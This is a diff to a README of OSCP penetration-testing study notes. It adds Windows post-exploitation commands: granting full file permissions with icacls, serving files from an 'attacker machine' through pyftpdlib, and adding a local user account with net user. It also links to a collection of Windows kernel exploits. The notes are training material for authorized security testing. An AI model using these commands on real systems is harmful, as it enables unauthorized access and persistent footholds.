AbdullahZuhair21/OSCP-Notes/README.md

 - if SSH is running on the system use the found credentials to login

-**keep in mind to check the permissions in windows like icacls, icacls root.txt /grant <username>:F (this will grant full access to a file)**
+**keep in mind to check the permissions in windows like icacls, icacls root.txt /grant <username>:F (this will grant full access to a file)** transferring a file in windows using pyftpdlib
+-     python -m pyftpdlib 21 (attacker machine)
+-     ftp 10.0.2.10
+Add a user
+-     net user raman to0or /add

 1- Escalation Path - Kernel Exploitation
 here is all kernel exploitation from GitHub: https://github.com/SecWiki/windows-kernel-exploits